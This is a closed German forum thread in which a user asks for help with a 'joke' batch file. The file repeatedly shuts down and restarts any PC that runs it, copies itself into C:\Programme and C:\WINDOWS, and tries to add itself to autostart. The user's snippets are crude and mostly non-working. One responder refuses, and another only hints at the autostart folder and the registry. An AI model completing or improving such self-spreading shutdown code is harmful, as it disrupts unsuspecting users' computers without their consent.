• Jetzt anmelden. Es dauert nur 2 Minuten und ist kostenlos!

Batch datei!

Status
Für weitere Antworten geschlossen.

minera

Neues Mitglied
Hallo,
ich wusste nicht ganz genau ob ich hier richtig bin,dennoch werde ich meine frage stellen und auf eine antwort warten:wink:

Also,
ich versuche gerade eine Batch datei zu entwickel mit einem Editor.
Bisher hatte ich leider keinen erfolg.Das einzige was ich bisher gemacht habe ist:

@echo off
shutdown.exe -s -t 60
shutdown.exe -r -t 120

die batchdatei soll also den pc runter fahren und auch wieder von alleine hochfahren.
Dieser Vorgang soll sich ruhig mehrmals wiederholen sobald der Pc an ist.Bloß funktioniert die batch datei nicht! Könnt ihr mir den richtigen code sagen? und mir sagen wo der fehler liegt?

Liebe Grüße
 
Werbung:
hi

ja aber es soll ja bei jedem beliebigen pc passieren.so ne art scherz datei,verstehst? also jeder der das downloadet soll es im autostart haben.Wie veranstalte ich das?
 
Werbung:
Der User der die Datei ausführt wird wohl dann weniger Scherzen wollen...

Sorry aber sowas unterstütze ich nicht, frag Böhseronkel der hat bestimmt was für dich :mrgreen:
 
Entweder du erstellst eine Kopie der Datei einfach im Autostart Ordner oder nutzt die Registry aus. Für beides mal das WWW durchsuchen...
 
...

hi,
ich bin da ziemlich neu bei den batch datein...
ich kenne zwar einige befehle ,weiß aber nichts damit anzufangen =(
es muss doch irgendwie gehen das die batch datei sich in den autostart kopiert.Jeder der drauf klickt müsste dann die datei im autostart haben.Könntet ihr mir nur den kopier Pfad geben?
 
Werbung:
noch eine frage

Hallo,
mir ist da noch eine frage eingefallen. ich versuche meine batch datei in
"C:\Programme" zu kopieren(achja die datei kopiert sich auch in c:\windows,soll aber dort nicht ausgeführt werden)
und das sie sich dann selbständig ausführt.
mein code lautet so:


echo n| xcopy "Kissbot2008.bat" "C:\Programme"
echo n| xcopy "Kissbot2008.bat" "C:\WINDOWS"
start "C:\Programme"
start "C:\Programme\Kissbot2008.bat"


Der Code funktioniert aber nicht:sad: !! woran kann das liegen?
 
Status
Für weitere Antworten geschlossen.
Zurück
Oben